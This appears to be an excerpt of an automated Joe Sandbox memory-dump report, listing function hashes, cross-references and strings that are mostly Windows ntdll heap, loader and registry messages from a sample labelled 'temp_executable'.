                                • Instruction Fuzzy Hash: D631C436901204EFEB02CB95DC88FDAB7B8EF49764F1140A1F915AB391DB71E944CA70
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 99d862a61134af8ac372e5e939ad98e4ffb414cfe310737f6b10ba41b6bd0fd5
                                • Instruction ID: 7ba46b736400deb1bff1a6f87eb8aeb166fdd8c2c524d46de6643b7653289672
                                • Opcode Fuzzy Hash: 99d862a61134af8ac372e5e939ad98e4ffb414cfe310737f6b10ba41b6bd0fd5
                                • Instruction Fuzzy Hash: C351EC75A01605EFFB09CF68C894BADB7B5BF44755F20816AE902A7390DFB4E901CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                • API String ID: 0-1168191160
                                • Opcode ID: 60e1845495c00d62cebf20ebf87b01d7a34589d5b190c31652d4371781ba95d8
                                • Instruction ID: 653935d459208341b2bcb9b902f5be8d858571f157a673802d1603b27bb952c5
                                • Opcode Fuzzy Hash: 60e1845495c00d62cebf20ebf87b01d7a34589d5b190c31652d4371781ba95d8
                                • Instruction Fuzzy Hash: 25F192B5A00A288BDBA4CF14CC80BD9B3B5EF44744F5440E9DA49A7740EB719EC5CF64
                                Strings
                                • HEAP: , xrefs: 32D414B6
                                • HEAP[%wZ]: , xrefs: 32D41632
                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32D41648
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: fa6bd37be20a68891aa9df14647d41a9a1f27cc5272cf01ad2004569020d1b5c
                                • Instruction ID: 570052702507e4fc5a81c77c4701035fd5ca6a94f0a44cc39217bc84ab3321bd
                                • Opcode Fuzzy Hash: fa6bd37be20a68891aa9df14647d41a9a1f27cc5272cf01ad2004569020d1b5c
                                • Instruction Fuzzy Hash: 83E1CE74A043459FEB19CF6AC4507BABBF1AF48704F548859E9DA8B385EF34E940CB50
                                Strings
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 32DB00F1
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 32DB00C7
                                • RTL: Re-Waiting, xrefs: 32DB0128
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                • Opcode ID: af1f501f2db4ff1fa13119901a45ffd512ea5a2e2def0f148ff090b098001d2c
                                • Instruction ID: 8ecb08d19c68f9cac395ec5882b1275934e4fc3d801a510c69391ec10c86a7cc
                                • Opcode Fuzzy Hash: af1f501f2db4ff1fa13119901a45ffd512ea5a2e2def0f148ff090b098001d2c
                                • Instruction Fuzzy Hash: 4CE1CE75608B419FE725CF28C890B2AB7E0BF84358F604A59F5A68B3E0DB74D944CB52
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                • API String ID: 0-2391371766
                                • Opcode ID: 35a0fb8a8f5626847b13b87655b1eea01e409744d4040ac9b6de85dd07e31aaf
                                • Instruction ID: 016b011edb05254b5e853330388af53846db131a002220c2b3c056dac315a525
                                • Opcode Fuzzy Hash: 35a0fb8a8f5626847b13b87655b1eea01e409744d4040ac9b6de85dd07e31aaf
                                • Instruction Fuzzy Hash: C5B1E0B1644395AFE351DF54C8C1B5BB7E8FB48754F400929FA409B790DBB0E848CBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: FilterFullPath$UseFilter$\??\
                                • API String ID: 0-2779062949
                                • Opcode ID: 2817c9329ac8aa565a6ef4e514bf2ca16a5890886bb138a579f8ba1d4825c28e
                                • Instruction ID: 5362a850b8fea65354ed2b6ed562838101aac38fbd0c72f2868c98d50f9875cb
                                • Opcode Fuzzy Hash: 2817c9329ac8aa565a6ef4e514bf2ca16a5890886bb138a579f8ba1d4825c28e
                                • Instruction Fuzzy Hash: CDA17D759016699BEB21DF24CC88BEAB7B8EF09704F1005EAE908A7350DB759EC4CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                • API String ID: 0-318774311
                                • Opcode ID: 8d7050875afe3818e492717845c2085b210d0d995fdbad191b76f93dde9e0eb0
                                • Instruction ID: 93485a57df74e687576d7115abf1885d2e0339902b3df7f4a9011512827e5ade
                                • Opcode Fuzzy Hash: 8d7050875afe3818e492717845c2085b210d0d995fdbad191b76f93dde9e0eb0
                                • Instruction Fuzzy Hash: 96819CB1608B40AFE755CF24C984B6AB7E8EF84754F44096DF9809B790DBB4D900CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                • API String ID: 0-373624363
                                • Opcode ID: 1124a4dcee043c5064845e31d8cfc05532ac95bd1362cfadf0c64418fc68ee92
                                • Instruction ID: 61e0f1c239f437e04bb42bbb087b634d6dca75abe25170d48822c415fde33e4a
                                • Opcode Fuzzy Hash: 1124a4dcee043c5064845e31d8cfc05532ac95bd1362cfadf0c64418fc68ee92
                                • Instruction Fuzzy Hash: C391CC75E04359CBEB15CF58D450BAEB7B1EF14368F548199EC84AB390DF789A80CB90
                                Strings
                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 32E1B3AA
                                • GlobalizationUserSettings, xrefs: 32E1B3B4
                                • TargetNtPath, xrefs: 32E1B3AF
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                • API String ID: 0-505981995
                                • Opcode ID: 25d39f381e56fd76dd39febc0b7a3cb470244449ceecae0589ac8b79f843c0f4
                                • Instruction ID: a44dc8cc500305fdeb9a0d00271e0bb903d56b96512591a53d5a462cfef88158
                                • Opcode Fuzzy Hash: 25d39f381e56fd76dd39febc0b7a3cb470244449ceecae0589ac8b79f843c0f4
                                • Instruction Fuzzy Hash: FF61C372D41228ABDB21DF54DC89BDAB7B9EB04714F4141E9E908AB350DB74EE84CF90
                                Strings
                                • HEAP: , xrefs: 32D9E442
                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 32D9E455
                                • HEAP[%wZ]: , xrefs: 32D9E435
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                • API String ID: 0-1340214556
                                • Opcode ID: f556f9abdadce728d33885d379d8b83e65071334db28a17ee11bf9c91e7fcdd7
                                • Instruction ID: b81b6b68f743b98903806af0e235bcaf2ddfba6e30ddc25c36672eb6497903f9
                                • Opcode Fuzzy Hash: f556f9abdadce728d33885d379d8b83e65071334db28a17ee11bf9c91e7fcdd7
                                • Instruction Fuzzy Hash: 96513775601788EFE706CBA4C884F9ABBF8FF05344F1440A5E6808B792D7B4E940CB60
                                Strings
                                • HEAP: , xrefs: 32DED79F
                                • HEAP[%wZ]: , xrefs: 32DED792
                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 32DED7B2
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                • API String ID: 0-3815128232
                                • Opcode ID: 1f642cb7e8564307972b9291439877ba9c748c607692b5c5da553618372c1117
                                • Instruction ID: 6df91a31ae2c21b8fc94a1ea0a65323090057e6e42f7c4df2b3fdff0c43b53b6
                                • Opcode Fuzzy Hash: 1f642cb7e8564307972b9291439877ba9c748c607692b5c5da553618372c1117
                                • Instruction Fuzzy Hash: F051F3B91007948EF355EB29C84277273E9DB45388F91884DE8C78B789DE36D847DB60
                                Strings
                                • Actx , xrefs: 32D732CC
                                • SXS: %s() passed the empty activation context data, xrefs: 32DB2808
                                • RtlCreateActivationContext, xrefs: 32DB2803
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                • API String ID: 0-859632880
                                • Opcode ID: 1375de46d62e6d23666856e25246e274da12bac650dca61c4c4a40771f9e84cd
                                • Instruction ID: 67987203ccd7520715be62773a84735366ccfd00431e0aa11d3c2c88d93ede48
                                • Opcode Fuzzy Hash: 1375de46d62e6d23666856e25246e274da12bac650dca61c4c4a40771f9e84cd
                                • Instruction Fuzzy Hash: 3531ED766003059BEF16CF28D894F9A37A5EF84718F518469ED059F781CBB4E84ACBE0
                                Strings
                                • GlobalFlag, xrefs: 32DCB30F
                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 32DCB2B2
                                • @, xrefs: 32DCB2F0
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                • API String ID: 0-4192008846
                                • Opcode ID: 12bfa27571af732ea32108b42c467a6d558d1bfc864bb69a8d3df8125ca20b84
                                • Instruction ID: e059d97c7c9b471ee970ca7cd9ad81742ff2cf505a049e6b74d273cd55861747
                                • Opcode Fuzzy Hash: 12bfa27571af732ea32108b42c467a6d558d1bfc864bb69a8d3df8125ca20b84
                                • Instruction Fuzzy Hash: C1311AB5E40219AEDB11DF94DC84AEEBBBCEF44748F500469EA05BB251DB74DA04CBA0
                                Strings
                                • @, xrefs: 32D811C5
                                • BuildLabEx, xrefs: 32D8122F
                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 32D8119B
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 0-3051831665
                                • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                • Instruction ID: 693a83c145b0af0fb89f4361f1a45b7cbd2e00001156cb78a3c8382e1231debe
                                • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                • Instruction Fuzzy Hash: 07317172900659BBDF12CBA5CC45FEEBBB9EF84754F104025E915A7360DB70DA09CBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@
                                • API String ID: 0-149943524
                                • Opcode ID: 180f2d4c5875839d983ab4e33c1724f927ee5052b173c0506520fdcd32f8c658
                                • Instruction ID: 82ffc3a65e90370bab8b04be81f577a0d6c3d179a11812806352605c6e8bceec
                                • Opcode Fuzzy Hash: 180f2d4c5875839d983ab4e33c1724f927ee5052b173c0506520fdcd32f8c658
                                • Instruction Fuzzy Hash: 8232B0B8508351CBDB25CF14C490B2EB7E1EF88748F60492EF99597390EBB4D984CB92
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 73c9e24d91a357feb153bd04e98b50c460c44030d041930af0018c3edd5dc531
                                • Instruction ID: 84052c1a10a4c9bc1dc298d23cf3a32c852a71ca6c4a74ca8fd1669aa4469d61
                                • Opcode Fuzzy Hash: 73c9e24d91a357feb153bd04e98b50c460c44030d041930af0018c3edd5dc531
                                • Instruction Fuzzy Hash: 0A31EF31201B52AFEB459F24CA50F8AFBA5BF94758F444125E94197B50DFB0E821CBE0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: Legacy$UEFI
                                • API String ID: 2994545307-634100481
                                • Opcode ID: d6bcbac0f4041c74ad27df5a1023d59b4699de9278ff6c7ac33790a9bdf951bd
                                • Instruction ID: 1e94fde5ec43f5bf51dc475ac881f5feb2b9f16b9ffa44bcd29edfb9b868936f
                                • Opcode Fuzzy Hash: d6bcbac0f4041c74ad27df5a1023d59b4699de9278ff6c7ac33790a9bdf951bd
                                • Instruction Fuzzy Hash: 08613CB1A003189FDB18CFA8C950BADB7F5BF48744F904069E54AEB351EB70D900CBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$$
                                • API String ID: 3446177414-233714265
                                • Opcode ID: 1f4e3ee8613567e97e9f656fc0400eeead1422b0726b9fabce7fd630a310806d
                                • Instruction ID: 58584ed9933b5fe93fce1c8bf6eb8f154063cbd7177996c7d62c66dbea78e2e3
                                • Opcode Fuzzy Hash: 1f4e3ee8613567e97e9f656fc0400eeead1422b0726b9fabce7fd630a310806d
                                • Instruction Fuzzy Hash: 55619CB5A01749DFEB21CFA4C580B99B7B1BF44308F604469D555AF790CBB4A981CBA0
                                Strings
                                • RtlpResUltimateFallbackInfo Enter, xrefs: 32D4A21B
                                • RtlpResUltimateFallbackInfo Exit, xrefs: 32D4A229
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                • API String ID: 0-2876891731
                                • Opcode ID: cbc6465b41b99e3b454cbd535ca4a801a14456ff1bf4b07d48adfe08651d2fbc
                                • Instruction ID: 22432df6506fda8e11b3fd777bdad3d50ae561b62359f6181d6061c16d2d673e
                                • Opcode Fuzzy Hash: cbc6465b41b99e3b454cbd535ca4a801a14456ff1bf4b07d48adfe08651d2fbc
                                • Instruction Fuzzy Hash: C441BB74A407449BEB05CF6AC4A5B5AB7B4FF45B44F2080A5EC40DB3A0EE76D940DB10
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                • API String ID: 0-118005554
                                • Opcode ID: 4fcbaa5588cb4fb98498df98d87d9f1b95c78022d8b7a1ed059e725f24e836f5
                                • Instruction ID: 1d0b387ba5acf69762e11e48b23894b7f2ef7217c7bf62407eefb8fa5c33f041
                                • Opcode Fuzzy Hash: 4fcbaa5588cb4fb98498df98d87d9f1b95c78022d8b7a1ed059e725f24e836f5
                                • Instruction Fuzzy Hash: 20312475608B818FD341CF68D880B2AB7E4EF85714F404869FC54CB790EBB1D905CB62
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local\$@
                                • API String ID: 0-380025441
                                • Opcode ID: 104235cb75a7e02c15972501dd2bb2f0e7ca0729f2be1d1ca148a012fe1db3cc
                                • Instruction ID: a8bc184f7a87c0ab81bd3e47b4ad8def40f082ac5a1257f9df7f7b83964db2f9
                                • Opcode Fuzzy Hash: 104235cb75a7e02c15972501dd2bb2f0e7ca0729f2be1d1ca148a012fe1db3cc
                                • Instruction Fuzzy Hash: 3731AFB1509385AFD350CF2CC880A8BBBE8EF95754F40492EF99483710D638DD08CBA2
                                Strings
                                • RtlpInitializeAssemblyStorageMap, xrefs: 32DB289A
                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 32DB289F
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                • API String ID: 0-2653619699
                                • Opcode ID: 9f3c2bdbe9f4525e2307a219fd7be30eefd7a7bed143e1c386623bf15af58e4a
                                • Instruction ID: 179c3299ced7003ff534b1cceb5abe736f7b91cd22a36b34b60df832d4ad7e5e
                                • Opcode Fuzzy Hash: 9f3c2bdbe9f4525e2307a219fd7be30eefd7a7bed143e1c386623bf15af58e4a
                                • Instruction Fuzzy Hash: F711A0B6B00215BBFB1A8E489D45F5A76A9DF84758F608079B904AB384DAB8DD0086A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: Cleanup Group$Threadpool!
                                • API String ID: 2994545307-4008356553
                                • Opcode ID: 93b358036c0c7e43d9e4932295083c26e82585e9a5586fe81546bea49b61a453
                                • Instruction ID: 0b1bb016564f658a412d0e8194dc4df33da398b3a7f3601057af3f4440a75554
                                • Opcode Fuzzy Hash: 93b358036c0c7e43d9e4932295083c26e82585e9a5586fe81546bea49b61a453
                                • Instruction Fuzzy Hash: 3101D1B2150740AFE311CF28DD05B1277F8EB44B1AF008979A658C7A90E739E944CB56
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: MUI
                                • API String ID: 0-1339004836
                                • Opcode ID: dd1dedb19a5a79c52923049332efe4aa1198547e1740615cb3b718766eb4ca84
                                • Instruction ID: 75818c77f79055968af1ab9738c070884b3fe29b9e75a54065bfd855d3eaa900
                                • Opcode Fuzzy Hash: dd1dedb19a5a79c52923049332efe4aa1198547e1740615cb3b718766eb4ca84
                                • Instruction Fuzzy Hash: C3823979E003189FEB14CFA9C880BADB7B1BF48354F51816AE859AB394DF709985CF50
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e31e6c11d250a8acb19011d5e9bdfe89bab1758acba0045b5e943d1942e8c0e1
                                • Instruction ID: 9b4f58938b10647e0bc38fc7feb8dd6e579a2c20f2d576ba2328180971727f78
                                • Opcode Fuzzy Hash: e31e6c11d250a8acb19011d5e9bdfe89bab1758acba0045b5e943d1942e8c0e1
                                • Instruction Fuzzy Hash: C0E19A74608341CFD704CF28C090A5ABBE0FF88348F548A6DE98A97391DF71E946CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @[2@[2
                                • API String ID: 0-2854983874
                                • Opcode ID: cf9c90b38871ee7d6cc428aa484e4de0d4746f5dec94aa939faa7a613449e088
                                • Instruction ID: b2448fa45d8623f79c284b7852b6fab1f6fefa3c91c63f9954593e45f1c7f4ea
                                • Opcode Fuzzy Hash: cf9c90b38871ee7d6cc428aa484e4de0d4746f5dec94aa939faa7a613449e088
